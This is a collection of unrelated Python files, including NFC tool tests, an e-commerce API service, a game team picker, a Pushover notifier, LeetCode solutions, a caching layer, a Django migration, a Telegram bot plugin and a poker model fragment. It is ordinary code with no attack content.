result = runner.invoke(main, ['smartposter', '--help'])
assert result.exit_code == 0
assert result.output.startswith(
'Usage: main smartposter [OPTIONS] RESOURCE')
def test_abbreviated_command_name(runner):
result = runner.invoke(main, ['smp', '--help'])
assert result.exit_code == 0
assert result.output.startswith('Usage: main smp [OPTIONS] RESOURCE')
def test_debug_option_prints_kwargs(runner):
params = '--debug smartposter http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.output.startswith("ndeftool.commands.SMartPoster {")
def test_smartposter_with_no_options(runner):
params = 'smartposter http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == b'\xd1\x02\x0eSp\xd1\x01\nU\x03nfcpy.org'
def test_two_smartposter_commands(runner):
params = 'smartposter http://nfcpy.org smartposter tel:12'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == \
b'\x91\x02\x0eSp\xd1\x01\nU\x03nfcpy.orgQ\x02\x07Sp\xd1\x01\x03U\x0512'
def test_smartposter_with_english_title(runner):
params = 'smartposter -T Title http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == \
b'\xd1\x02\x1aSp\x91\x01\nU\x03nfcpy.orgQ\x01\x08T\x02enTitle'
def test_smartposter_with_german_title(runner):
params = 'smartposter -t de Titel http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == \
b'\xd1\x02\x1aSp\x91\x01\nU\x03nfcpy.orgQ\x01\x08T\x02deTitel'
def test_smartposter_with_two_titles(runner):
params = 'smartposter -T Title -t de Titel http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == \
b'\xd1\x02&Sp\x91\x01\nU\x03nfcpy.org' \
b'\x11\x01\x08T\x02deTitelQ\x01\x08T\x02enTitle'
def test_smartposter_with_action_exec(runner):
params = 'smartposter -a exec http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == \
b'\xd1\x02\x15Sp\x91\x01\nU\x03nfcpy.orgQ\x03\x01act\x00'
def test_smartposter_with_png_icon(isolated_runner):
icon_1x1_png_data = bytearray.fromhex(
'89504e470d0a1a0a0000000d494844520000000100000001080200000090'
'7753de0000000c4944415408d763f8ffff3f0005fe02fedccc59e7000000'
'0049454e44ae426082')
    with open('1x1.png', 'wb') as f:
        f.write(icon_1x1_png_data)
params = 'smartposter -i 1x1.png http://nfcpy.org'.split()
result = isolated_runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == (
b'\xd1\x02_Sp\x91\x01\nU\x03nfcpy.orgR\tEimage/png\x89PNG\r\n\x1a\n'
b'\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00'
b'\x00\x90wS\xde\x00\x00\x00\x0cIDAT\x08\xd7c\xf8\xff\xff?\x00\x05'
b'\xfe\x02\xfe\xdc\xccY\xe7\x00\x00\x00\x00IEND\xaeB`\x82')
def test_smartposter_with_invalid_icon(isolated_runner):
    with open('1x1.png', 'w') as f:
        f.write('this is not a png file')
params = 'smartposter -i 1x1.png http://nfcpy.org'.split()
result = isolated_runner.invoke(main, params)
assert result.exit_code == 1
assert "Error:" in result.output
|
import typing
from typing import Optional
from uuid import UUID
from marshmallow import Schema, fields, post_dump
from commercetools import helpers, schemas, types
from commercetools.services import abstract
from commercetools.typing import OptionalListInt, OptionalListStr, OptionalListUUID
__all__ = ["ProductProjectionService"]
class ProductProjectionsBaseSchema(abstract.AbstractQuerySchema):
staged = fields.Bool(data_key="staged", required=False, missing=False)
price_currency = fields.String(data_key="priceCurrency")
price_country = fields.String(data_key="priceCountry")
price_customer_group = fields.UUID(data_key="priceCustomerGroup")
price_channel = fields.UUID(data_key="priceChannel")
class ProductProjectionsQuerySchema(ProductProjectionsBaseSchema):
pass
class ProductProjectionsSearchSchema(ProductProjectionsBaseSchema):
text = fields.Method("text_serialize")
fuzzy = fields.Bool()
fuzzy_level = fields.Integer(data_key="fuzzy.level")
filter = helpers.OptionalList(fields.String())
filter_query = helpers.OptionalList(fields.String(), data_key="filter.query")
filter_facets = helpers.OptionalList(fields.String(), data_key="filter.facets")
facet = helpers.OptionalList(fields.String())
mark_matching_variants = fields.Bool(data_key="markMatchingVariants")
def text_serialize(self, value):
result = {}
data = value.get("text") or {}
for k, v in data.items():
result[f"text.{k}"] = v
return result
@post_dump
def merge_text(self, data):
value = data.pop("text")
data.update(value)
return data
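    # Hedged illustration (not part of the schema): dumping
    #   {"text": {"en": "shirt"}, "fuzzy": True}
    # first serializes the language map into a nested {"text.en": "shirt"} via
    # text_serialize(), and merge_text() then lifts those keys to the top level,
    # giving flat query parameters such as {"text.en": "shirt", "fuzzy": True}.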
class ProductProjectionService(abstract.AbstractService):
def get_by_id(
self,
id: str,
staged: bool = False,
price_currency: str = None,
price_country: str = None,
price_customer_group: UUID = None,
price_channel: UUID = None,
expand: OptionalListStr = None,
) -> Optional[types.ProductProjection]:
params = {
"staged": staged,
"price_currency": price_currency,
"price_country": price_country,
"price_customer_group": price_customer_group,
"price_channel": price_channel,
"expand": expand,
}
query_params = ProductProjectionsBaseSchema().dump(params)
return self._client._get(
f"product-projections/{id}", query_params, schemas.ProductProjectionSchema
)
def get_by_key(
self,
key: str,
staged: bool = False,
price_currency: OptionalListStr = None,
price_country: OptionalListStr = None,
price_customer_group: typing.Optional[UUID] = None,
price_channel: typing.Optional[UUID] = None,
expand: OptionalListStr = None,
) -> types.ProductProjection:
params = {
"staged": staged,
"price_currency": price_currency,
"price_country": price_country,
"price_customer_group": price_customer_group,
"price_channel": price_channel,
"expand": expand,
}
query_params = ProductProjectionsBaseSchema().dump(params)
return self._client._get(
f"product-projections/key={key}", query_params, schemas.ProductProjectionSchema
)
def query(
self,
where: OptionalListStr = None,
sort: OptionalListStr = None,
expand: OptionalListStr = None,
limit: OptionalListInt = None,
offset: OptionalListInt = None,
staged: bool = False,
price_currency: OptionalListStr = None,
price_country: OptionalListStr = None,
price_customer_group: OptionalListUUID = None,
price_channel: OptionalListUUID = None,
) -> types.ProductProjectionPagedQueryResponse:
params = ProductProjectionsQuerySchema().dump(
{
"where": where,
"sort": sort,
"expand": expand,
"limit": limit,
"offset": offset,
"staged": staged,
"price_currency": price_currency,
"price_country": price_country,
"price_customer_group": price_customer_group,
"price_channel": price_channel,
}
)
return self._client._get(
"product-projections",
params,
schemas.ProductProjectionPagedQueryResponseSchema,
)
def search(
self,
text: typing.Optional[typing.Dict[str, str]] = None,
fuzzy: typing.Optional[bool] = None,
fuzzy_level: typing.Optional[int] = None,
filter: OptionalListStr = None,
filter_query: OptionalListStr = None,
filter_facets: OptionalListStr = None,
facet: OptionalListStr = None,
sort: OptionalListStr = None,
limit: OptionalListInt = None,
offset: OptionalListInt = None,
staged: bool = False,
mark_matching_variants: bool = False,
price_currency: OptionalListStr = None,
price_country: OptionalListStr = None,
price_customer_group: OptionalListUUID = None,
price_channel: OptionalListUUID = None,
expand: OptionalListStr = None,
) -> types.ProductProjectionPagedSearchResponse:
params = {
"text": text,
"fuzzy": fuzzy,
"fuzzy_level": fuzzy_level,
"filter": filter,
"filter_query": filter_query,
"filter_facets": filter_facets,
"facet": facet,
"sort": sort,
"limit": limit,
"offset": offset,
"staged": staged,
"mark_matching_variants": mark_matching_variants,
"price_currency": price_currency,
"price_country": price_country,
"price_customer_group": price_customer_group,
"price_channel": price_channel,
"expand": expand,
}
return self._client._post(
"product-projections/search",
{},
params,
ProductProjectionsSearchSchema,
response_schema_cls=schemas.ProductProjectionPagedSearchResponseSchema,
form_encoded=True,
)
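# --- Hedged usage sketch (service wiring is an assumption, not shown in this module) ---
#   service = ProductProjectionService(client)
#   response = service.search(text={"en": "shirt"}, fuzzy=True, staged=False, limit=20)
#   for projection in response.results:
#       print(projection.id, projection.name)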
|
# More info on these dicts in team_picker_setup.py
dict = {1: {'exile': ['yasuo'], 'robot': ['blitzcrank']}, 2: {'dragon': ['aurelionsol', 'shyvana'], 'phantom': ['karthus', 'kindred', 'mordekaiser'], 'guardian': ['braum', 'leona']}, 3: {'pirate': ['gangplank', 'graves', 'missfortune', 'pyke', 'twistedfate'], 'void': ['chogath', 'kassadin', 'khazix', 'reksai'], 'elementalist': ['anivia', 'brand', 'kennen', 'lissandra'], 'shapeshifter': ['elise', 'gnar', 'nidalee', 'shyvana', 'swain']}, 4: {'imperial': ['darius', 'draven', 'katarina', 'swain'], 'ninja': ['akali', 'kennen', 'shen', 'zed'], 'wild': ['ahri', 'gnar', 'nidalee', 'rengar', 'warwick'], 'brawler': ['blitzcrank', 'chogath', 'reksai', 'volibear', 'warwick'], 'gunslinger': ['gangplank', 'graves', 'lucian', 'missfortune', 'tristana'], 'ranger': ['ashe', 'kindred', 'varus', 'vayne']}, 6: {'demon': ['aatrox', 'brand', 'elise', 'evelynn', 'morgana', 'swain', 'varus'], 'glacial': ['anivia', 'ashe', 'braum', 'lissandra', 'sejuani', 'volibear'], 'noble': ['fiora', 'garen', 'kayle', 'leona', 'lucian', 'vayne'], 'yordle': ['gnar', 'kennen', 'lulu', 'poppy', 'tristana', 'veigar'], 'assassin': ['akali', 'evelynn', 'katarina', 'khazix', 'pyke', 'rengar', 'zed'], 'blademaster': ['aatrox', 'draven', 'fiora', 'gangplank', 'shen', 'yasuo'], 'knight': ['darius', 'garen', 'kayle', 'mordekaiser', 'poppy', 'sejuani'], 'sorcerer': ['ahri', 'aurelionsol', 'karthus', 'kassadin', 'lulu', 'morgana', 'twistedfate', 'veigar']}}
champ_dict = {'aatrox': ['demon', 'blademaster'], 'ahri': ['wild', 'sorcerer'], 'akali': ['ninja', 'assassin'], 'anivia': ['glacial', 'elementalist'], 'ashe': ['glacial', 'ranger'], 'aurelionsol': ['dragon', 'sorcerer'], 'blitzcrank': ['robot', 'brawler'], 'brand': ['demon', 'elementalist'], 'braum': ['glacial', 'guardian'], 'chogath': ['void', 'brawler'], 'darius': ['imperial', 'knight'], 'draven': ['imperial', 'blademaster'], 'elise': ['demon', 'shapeshifter'], 'evelynn': ['demon', 'assassin'], 'fiora': ['noble', 'blademaster'], 'gangplank': ['pirate', 'gunslinger', 'blademaster'], 'garen': ['noble', 'knight'], 'gnar': ['wild', 'yordle', 'shapeshifter'], 'graves': ['pirate', 'gunslinger'], 'karthus': ['phantom', 'sorcerer'], 'kassadin': ['void', 'sorcerer'], 'katarina': ['imperial', 'assassin'], 'kayle': ['noble', 'knight'], 'kennen': ['ninja', 'yordle', 'elementalist'], 'khazix': ['void', 'assassin'], 'kindred': ['phantom', 'ranger'], 'leona': ['noble', 'guardian'], 'lissandra': ['glacial', 'elementalist'], 'lucian': ['noble', 'gunslinger'], 'lulu': ['yordle', 'sorcerer'], 'missfortune': ['pirate', 'gunslinger'], 'mordekaiser': ['phantom', 'knight'], 'morgana': ['demon', 'sorcerer'], 'nidalee': ['wild', 'shapeshifter'], 'poppy': ['yordle', 'knight'], 'pyke': ['pirate', 'assassin'], 'reksai': ['void', 'brawler'], 'rengar': ['wild', 'assassin'], 'sejuani': ['glacial', 'knight'], 'shen': ['ninja', 'blademaster'], 'shyvana': ['dragon', 'shapeshifter'], 'swain': ['imperial', 'demon', 'shapeshifter'], 'tristana': ['yordle', 'gunslinger'], 'twistedfate': ['pirate', 'sorcerer'], 'varus': ['demon', 'ranger'], 'vayne': ['noble', 'ranger'], 'veigar': ['yordle', 'sorcerer'], 'volibear': ['glacial', 'brawler'], 'warwick': ['wild', 'brawler'], 'yasuo': ['exile', 'blademaster'], 'zed': ['ninja', 'assassin']}
class_dict = {'demon': ['aatrox', 'brand', 'elise', 'evelynn', 'morgana', 'swain', 'varus'], 'dragon': ['aurelionsol', 'shyvana'], 'exile': ['yasuo'], 'glacial': ['anivia', 'ashe', 'braum', 'lissandra', 'sejuani', 'volibear'], 'imperial': ['darius', 'draven', 'katarina', 'swain'], 'noble': ['fiora', 'garen', 'kayle', 'leona', 'lucian', 'vayne'], 'ninja': ['akali', 'kennen', 'shen', 'zed'], 'pirate': ['gangplank', 'graves', 'missfortune', 'pyke', 'twistedfate'], 'phantom': ['karthus', 'kindred', 'mordekaiser'], 'robot': ['blitzcrank'], 'void': ['chogath', 'kassadin', 'khazix', 'reksai'], 'wild': ['ahri', 'gnar', 'nidalee', 'rengar', 'warwick'], 'yordle': ['gnar', 'kennen', 'lulu', 'poppy', 'tristana', 'veigar'], 'assassin': ['akali', 'evelynn', 'katarina', 'khazix', 'pyke', 'rengar', 'zed'], 'blademaster': ['aatrox', 'draven', 'fiora', 'gangplank', 'shen', 'yasuo'], 'brawler': ['blitzcrank', 'chogath', 'reksai', 'volibear', 'warwick'], 'elementalist': ['anivia', 'brand', 'kennen', 'lissandra'], 'guardian': ['braum', 'leona'], 'gunslinger': ['gangplank', 'graves', 'lucian', 'missfortune', 'tristana'], 'knight': ['darius', 'garen', 'kayle', 'mordekaiser', 'poppy', 'sejuani'], 'ranger': ['ashe', 'kindred', 'varus', 'vayne'], 'shapeshifter': ['elise', 'gnar', 'nidalee', 'shyvana', 'swain'], 'sorcerer': ['ahri', 'aurelionsol', 'karthus', 'kassadin', 'lulu', 'morgana', 'twistedfate', 'veigar']}
class_bonus_dict = {'demon': 6, 'dragon': 2, 'exile': 1, 'glacial': 6, 'imperial': 4, 'noble': 6, 'ninja': 4, 'pirate': 3, 'phantom': 2, 'robot': 1, 'void': 3, 'wild': 4, 'yordle': 6, 'assassin': 6, 'blademaster': 6, 'brawler': 4, 'elementalist': 3, 'guardian': 2, 'gunslinger': 4, 'knight': 6, 'ranger': 4, 'shapeshifter': 3, 'sorcerer': 6}
def help_me(first):
"""
Given the first champion, output who I should build.
Runtime:
"""
# first = input("Name of your first chamption: ").lower()
perfect_team = {}
team = [first]
classes = champ_dict[first]
remaining_slots = 8
remaining_for_bonus = class_bonus_dict[classes[0]] - 1
print(remaining_for_bonus, "more for ", classes[0], " bonus")
current_class = classes[0]
perfect_team.update({current_class: [first]})
for i in range(remaining_for_bonus): # Loop for each remaining slot for the bonus.
new_champ = None
# If the character is not already inside the perfect team, add it within the correct class.
if class_dict[current_class][i] not in perfect_team[current_class]:
# Adding the new character to the perfect team
new_champ = class_dict[current_class][i]
perfect_team[current_class] += [new_champ]
team.append(new_champ)
else:
# Adding the new character to the perfect team
new_champ = class_dict[current_class][i+1]
perfect_team[current_class] += [new_champ]
team.append(new_champ)
for c in champ_dict[new_champ]:
if c not in classes:
classes.append(c)
remaining_slots -= 1
# Working this far.
# TODO: Build the rest of the team. Figure out what the next class should be.
    if remaining_slots == 5: # There is no bonus with exactly 5 characters.
# Do 2 more classes.
print("NO CLASS WITH 5")
pass
else:
options_for_next_class = dict[remaining_slots] # All classes that need all the current remaining slots.
next_class = None # Class that is already present in list and is an option in the list above.
for c in classes: # Finding a match
if c in options_for_next_class.keys():
next_class = c
break
        if next_class is None: # No matches
# TODO: Pick at random.
print("NO MATCHES FOUND")
# print("Next Class: ", next_class)
slots_for_next = 0
options_for_next_champ = list(set(class_dict[next_class]) - set(team))
# print("Options for {} class: {}".format(next_class, options_for_next_champ))
perfect_team.update({next_class : []})
for count in range(remaining_slots):
new_class_champ = options_for_next_champ[count]
perfect_team[next_class].append(new_class_champ)
remaining_slots -= 1
team.append(new_class_champ)
for c in champ_dict[new_class_champ]:
if c not in classes:
classes.append(c)
print("Perfect Team:",perfect_team)
print("Team:",team)
print("Classes:", classes)
print("Remaining Slots:", remaining_slots)
help_me('kennen')
|
import requests
PO_TOKEN = "ajnub*********74xi8gifnp6r"
PO_USER = "u1dj************n81x6vr7vx"
def send_push_notify(text):
if PO_USER == "yourpushoveruser" or PO_USER is None:
print("No notifications since po is not setup")
return
try:
r = requests.post("https://api.pushover.net/1/messages.json", data={
"token": PO_TOKEN,
"user": PO_USER,
"message": text
})
except Exception as err:
print(f"Failed in pinging push notifications {err}")
|
class Solution:
def divisorGame(self, N: int) -> bool:
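        # Alice wins exactly when N is even: taking x = 1 hands Bob an odd number, and an
        # odd number only has odd divisors, so Bob must hand back an even one; repeating
        # this, Alice eventually receives 2 and wins. Hence the parity check below.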
return not (N & 1)
|
#!/usr/bin/env python
import os
import sys
import pyami.resultcache
import pyami.fileutil
import cachefs
import threading
DEBUG = True
def debug(s):
    if DEBUG:
        sys.stderr.write(s)
        sys.stderr.write('\n')
class Cache(pyami.resultcache.ResultCache):
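    """Two-level result cache: results live in the in-memory ResultCache and are mirrored
    to a size-limited on-disk CacheFS. A memory miss falls back to the disk copy (see
    _get), and a memory hit refreshes the file's timestamps so it is not evicted early."""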
def __init__(self, disk_cache_path, disk_cache_size, *args, **kwargs):
self.diskcache = cachefs.CacheFS(disk_cache_path, disk_cache_size)
pyami.resultcache.ResultCache.__init__(self, *args, **kwargs)
self.lock = threading.Lock()
def check_disable(self, pipeline):
for pipe in pipeline:
if pipe.disable_cache:
return True
return False
def _put(self, pipeline, result):
if self.check_disable(pipeline):
return
pyami.resultcache.ResultCache.put(self, pipeline, result)
if pipeline[-1].cache_file:
self.file_put(pipeline, result)
def put(self, pipeline, result):
self.lock.acquire()
try:
return self._put(pipeline, result)
finally:
self.lock.release()
def _get(self, pipeline):
if self.check_disable(pipeline):
return
## try memory cache
result = pyami.resultcache.ResultCache.get(self, pipeline)
if result is None:
debug('NOT IN MEMORY: %s' %(pipeline[-1],))
## try disk cache
result = self.file_get(pipeline)
if result is not None:
debug('IN FILE: %s' %(pipeline[-1],))
pyami.resultcache.ResultCache.put(self, pipeline, result)
else:
debug('IN MEMORY: %s' % (pipeline[-1],))
## found in memory cache, but need to touch or rewrite disk cache
if not self.file_touch(pipeline):
debug('NOT IN FILE: %s' % (pipeline[-1],))
self.file_put(pipeline, result)
return result
def get(self, pipeline):
self.lock.acquire()
try:
return self._get(pipeline)
finally:
self.lock.release()
def file_put(self, pipeline, result, permanent=False):
final_pipe = pipeline[-1]
# some pipes specify not to be cached to disk
if not final_pipe.cache_file:
return
resultfilename = self.result_filename(pipeline)
path = os.path.dirname(resultfilename)
self.diskcache.makedir(path, recursive=True, allow_recreate=True)
f = self.diskcache.open(resultfilename, 'wb')
final_pipe.put_result(f, result)
f.close()
def file_get(self, pipeline):
resultfilename = self.result_filename(pipeline)
try:
f = self.diskcache.open(resultfilename, 'rb')
        except Exception:
return None
result = pipeline[-1].get_result(f)
f.close()
return result
def file_touch(self, pipeline):
resultfilename = self.result_filename(pipeline)
exists = self.diskcache.exists(resultfilename)
if exists:
self.diskcache.settimes(resultfilename)
return exists
def result_filename(self, pipeline):
pipeline_path = self.pipeline_path(pipeline)
resultname = pipeline[-1].resultname()
path = os.path.join(os.sep, pipeline_path, resultname)
return path
def pipeline_path(self, pipeline):
parts = [pipe.dirname() for pipe in pipeline]
parts = filter(None, parts)
path = os.path.join(*parts)
return path
if __name__ == '__main__':
test_disk_cache_manager()
|
# Generated by Django 2.2 on 2020-03-31 19:41
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import sorl.thumbnail.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("posts", "0003_post_image"),
]
operations = [
migrations.AlterField(
model_name="post",
name="image",
field=sorl.thumbnail.fields.ImageField(
blank=True, null=True, upload_to="posts/"
),
),
migrations.CreateModel(
name="Comment",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("text", models.TextField()),
(
"created",
models.DateTimeField(
auto_now_add=True, verbose_name="date created"
),
),
(
"author",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="comments",
to=settings.AUTH_USER_MODEL,
),
),
(
"post",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="comments",
to="posts.Post",
),
),
],
),
]
|
### DO NOT REMOVE THIS
from typing import List
### DO NOT REMOVE THIS
class Solution:
def divide(self, dividend: int, divisor: int) -> int:
if dividend==-2147483648 and divisor==-1:
return 2147483647
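        # Python's // floors toward negative infinity, but the problem asks for truncation
        # toward zero; when the signs differ and the division is inexact, floor division
        # overshoots by one, so 1 is added back below.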
if dividend/divisor<0:
return dividend//divisor if dividend%divisor==0 else dividend//divisor +1
else:
return dividend//divisor
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from vector import vector, plot_peaks
from oct2py import octave
# Load the Octave-Forge signal package.
octave.eval("pkg load signal")
print('Detect peaks without any filters.')
(_, indexes) = octave.findpeaks(np.array(vector), 'DoubleSided',
'MinPeakHeight', 0, 'MinPeakDistance', 0, 'MinPeakWidth', 0)
# The results are in a 2D array and in floats: get back to 1D array and convert
# peak indexes to integer. Also this is MATLAB-style indexing (one-based),
# so we must subtract one to get back to Python indexing (zero-based).
indexes = indexes[0].astype(int) - 1
print('Peaks are: %s' % (indexes))
plot_peaks(np.array(vector), indexes,
algorithm='Octave-Forge findpeaks')
print('Detect peaks with minimum height and distance filters.')
(pks, indexes) = octave.findpeaks(np.array(vector), 'DoubleSided',
'MinPeakHeight', 6, 'MinPeakDistance', 2, 'MinPeakWidth', 0)
# The results are in a 2D array and in floats: get back to 1D array and convert
# peak indexes to integer. Also this is MATLAB-style indexing (one-based),
# so we must subtract one to get back to Python indexing (zero-based).
indexes = indexes[0].astype(int) - 1
print('Peaks are: %s' % (indexes))
plot_peaks(np.array(vector), indexes, mph=6, mpd=2,
algorithm='Octave-Forge findpeaks')
|
"""Tests."""
import pytest
from part1 import TLSTester
from part2 import SSLTester
class TestPart1UnitTests:
"""."""
@pytest.mark.parametrize("test_input, expected", [
("abba", True),
("abcd", False),
("aaaa", False),
("ioxxoj", True)
])
def test_contains_abba(self, test_input, expected):
"""."""
tls_tester = TLSTester()
assert(tls_tester.contains_abba(test_input) == expected)
@pytest.mark.parametrize("test_input, expected", [
(["abba", "mnop", "qrst"], True),
(["abcd", "bdbd", "xyxy"], False),
(["aaaa", "qwer", "tyui"], False),
(["ioxxoj", "asdfgh", "zxcvbn"], True)
])
def test_batch_contains_abba(self, test_input, expected):
"""."""
tls_tester = TLSTester()
assert(tls_tester.batch_contains_abba(test_input) == expected)
@pytest.mark.parametrize("test_input, expected", [
("abba[mnop]qrst", True),
("abcd[bddb]xyyx", False),
("aaaa[qwer]tyui", False),
("ioxxoj[asdfgh]zxcvbn", True)
])
def test_ip_supports_tls(self, test_input, expected):
"""."""
tls_tester = TLSTester()
assert(tls_tester.ip_supports_tls(test_input) == expected)
def test_count_supported_ips(self):
"""."""
test_input = [
"abba[mnop]qrst",
"abcd[bddb]xyyx",
"aaaa[qwer]tyui",
"ioxxoj[asdfgh]zxcvbn",
]
expected = 2
tls_tester = TLSTester(test_input)
assert(tls_tester.count_supported_ips() == expected)
class TestPart2UnitTests:
"""."""
@pytest.mark.parametrize("test_input, expected", [
('aba', ['aba']),
('asdfdsa', ['dfd']),
('asdsdf', ['sds', 'dsd']),
('asdf', []),
('asdfffdsa', [])
])
def test_find_aba(self, test_input, expected):
"""."""
ssl_tester = SSLTester()
assert(ssl_tester.find_aba(test_input) == expected)
@pytest.mark.parametrize("test_input, expected", [
([], []),
(['asdfdgh'], ['dfd']),
(['asdsf', 'asdfd'], ['sds', 'dfd']),
(['asds', 'asdfdfg'], ['sds', 'dfd', 'fdf'])
])
def test_batch_find_aba(self, test_input, expected):
"""."""
ssl_tester = SSLTester()
assert(ssl_tester.batch_find_aba(test_input) == expected)
@pytest.mark.parametrize("test_key, test_seq, expected", [
('aba', ['bab'], True),
('aba', ['aba', 'asdffssdsds', 'asdfs'], False),
('bab', ['suuebb', 'aeth', 'aaabaa'], True)
])
def test_has_corresponding_bab(self, test_key, test_seq, expected):
"""."""
ssl_tester = SSLTester()
assert(ssl_tester.has_corresponding_bab(test_key, test_seq) == expected)
@pytest.mark.parametrize("test_input, expected", [
('aba[bab]xyz', True),
('xyx[xyx]xyx', False),
('aaa[kek]eke', True),
('zazbz[bzb]cdb', True)
])
def test_ip_supports_ssl(self, test_input, expected):
"""."""
ssl_tester = SSLTester()
assert(ssl_tester.ip_supports_ssl(test_input) == expected)
def test_count_supported_ips(self):
"""."""
test_input = [
'aba[bab]xyz',
'xyx[xyx]xyx',
'aaa[kek]eke',
'zazbz[bzb]cdb'
]
expected = 3
ssl_tester = SSLTester()
assert(ssl_tester.count_supported_ips(test_input) == expected)
|
# Copyright (C) 2020-2021 by TeamSpeedo@Github, < https://github.com/TeamSpeedo >.
#
# This file is part of < https://github.com/TeamSpeedo/FridayUserBot > project,
# and is released under the "GNU v3.0 License Agreement".
# Please see < https://github.com/TeamSpeedo/blob/master/LICENSE >
#
# All rights reserved.
from pyrogram import filters
from database.welcomedb import add_welcome, del_welcome, welcome_info
from main_start.config_var import Config
from main_start.core.decorators import speedo_on_cmd, listen
from main_start.helper_func.basic_helpers import edit_or_reply
@speedo_on_cmd(
["savewelcome"],
cmd_help={
"help": "Save Welcome Message!",
"example": "{ch}savewelcome (reply to welcome message)",
},
)
async def save_welcome(client, message):
engine = message.Engine
note_ = await edit_or_reply(message, engine.get_string("PROCESSING"))
if not message.reply_to_message:
await note_.edit(engine.get_string("REPLY_TO_WELCOME"))
return
msg = message.reply_to_message
cool = await msg.copy(int(Config.LOG_GRP))
await add_welcome(int(message.chat.id), cool.message_id)
await note_.edit(engine.get_string("WELCOME_SAVED"))
@listen(filters.new_chat_members & filters.group)
async def welcomenibba(client, message):
engine = message.Engine
if not message:
return
if not await welcome_info(int(message.chat.id)):
return
if not message.chat:
return
is_m = False
sed = await welcome_info(int(message.chat.id))
m_s = await client.get_messages(int(Config.LOG_GRP), sed["msg_id"])
if await is_media(m_s):
text_ = m_s.caption or ""
is_m = True
else:
text_ = m_s.text or ""
if text_ != "":
mention = message.new_chat_members[0].mention
user_id = message.new_chat_members[0].id
user_name = message.new_chat_members[0].username or "No Username"
first_name = message.new_chat_members[0].first_name
last_name = message.new_chat_members[0].last_name or "No Last Name"
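        # The saved welcome text may use {mention}, {user_id}, {user_name}, {first_name}
        # and {last_name} placeholders; they are filled in for the first new member below.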
text_ = text_.format(mention=mention, user_id=user_id, user_name=user_name, first_name=first_name, last_name=last_name)
if not is_m:
await client.send_message(
message.chat.id,
text_,
reply_to_message_id=message.message_id)
else:
await m_s.copy(
chat_id=int(message.chat.id),
caption=text_,
reply_to_message_id=message.message_id,
)
async def is_media(message):
return bool(
(
message.photo
or message.video
or message.document
or message.audio
or message.sticker
or message.animation
or message.voice
or message.video_note
)
)
@speedo_on_cmd(
["delwelcome"],
cmd_help={"help": "Delete welcome Message!", "example": "{ch}delwelcome"},
)
async def del_welcomez(client, message):
engine = message.Engine
note_ = await edit_or_reply(message, engine.get_string("PROCESSING"))
if not await welcome_info(int(message.chat.id)):
await note_.edit(engine.get_string("FILTER_3").format("Welcome Message"))
return
await del_welcome(int(message.chat.id))
await note_.edit(engine.get_string("FILTER_2").format("Welcome", "Message"))
@speedo_on_cmd(
["welcome"],
cmd_help={"help": "Current Welcome Message!", "example": "{ch}welcome"},
)
async def show_welcome(client, message):
engine = message.Engine
pablo = await edit_or_reply(message, engine.get_string("PROCESSING"))
sed = await welcome_info(int(message.chat.id))
if sed is False:
await pablo.edit(engine.get_string("FILTER_3").format("Welcome Message"))
return
mag = f""" Welcome Message In Correct Chat Is :"""
await client.copy_message(
from_chat_id=int(Config.LOG_GRP),
chat_id=int(message.chat.id),
message_id=sed["msg_id"],
reply_to_message_id=message.message_id,
)
await pablo.edit(mag)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from poker_env.datatypes import Globals,SUITS,RANKS,Action,Street,NetworkActions
import numpy as np
from models.model_utils import strip_padding,unspool,hardcode_handstrength
import time
import math
from functools import lru_cache
class IdentityBlock(nn.Module):
def __init__(self,hidden_dims,activation):
"""hidden_dims must contain 3 values"""
super().__init__()
assert len(hidden_dims) == 3
self.activation = activation
self.fc1 = nn.Linear(hidden_dims[0],hidden_dims[1])
self.fc2 = nn.Linear(hidden_dims[1],hidden_dims[2])
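        # Note: the residual add in forward() assumes hidden_dims[0] == hidden_dims[1],
        # otherwise self.fc1(x) + x fails on a shape mismatch.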
def forward(self,x):
out = self.activation(self.fc1(x)) + x
out2 = self.activation(self.fc2(out))
return out2
class NetworkFunctions(object):
def __init__(self,nA,nB):
self.nA = nA
self.nB = nB
self.nC = nA - 2 + self.nB
def wrap_action(self,action,betsize_category,previous_action):
"""
Wraps split action/betsize into flat action.
Bets and raises are combined into one.
"""
actions = torch.zeros(self.nC)
if action < 3:
actions[action] = 1
else: # Bet or raise
actions[betsize_category + 3] = 1
return torch.argmax(actions, dim=0).unsqueeze(0)
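    # Hedged example (assuming nA=5 and nB=2, so nC=5): check/fold/call keep their own
    # slots 0-2, while any bet or raise maps to slot betsize_category + 3, e.g.
    # wrap_action(action=4, betsize_category=1, previous_action=...) lights index 4.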
@lru_cache(maxsize=30)
def batch_unwrap_action(self,actions:torch.Tensor,previous_actions:torch.Tensor):
"""
Unwraps flat action into action_category and betsize_category
Action is from network outputs - 0-5
previous_action is from env. 1-6
"""
int_actions = torch.zeros_like(actions)
int_betsizes = torch.zeros_like(actions)
prev_ge_2 = torch.as_tensor((previous_actions > Action.FOLD)&(previous_actions < Action.UNOPENED))
prev_le_3 = torch.as_tensor((previous_actions < Action.CALL)|(previous_actions == Action.UNOPENED))
actions_le_2 = actions < 2
actions_ge_2 = actions > 2
actions_le_3 = actions < 3
int_actions[actions_le_2] = actions[actions_le_2]
int_betsizes[actions_le_2] = 0
int_betsizes[actions_ge_2] = actions[actions_ge_2] - 3
int_actions[(actions_ge_2)&(prev_ge_2)] = 4
int_actions[(actions_ge_2)&(prev_le_3)] = 3
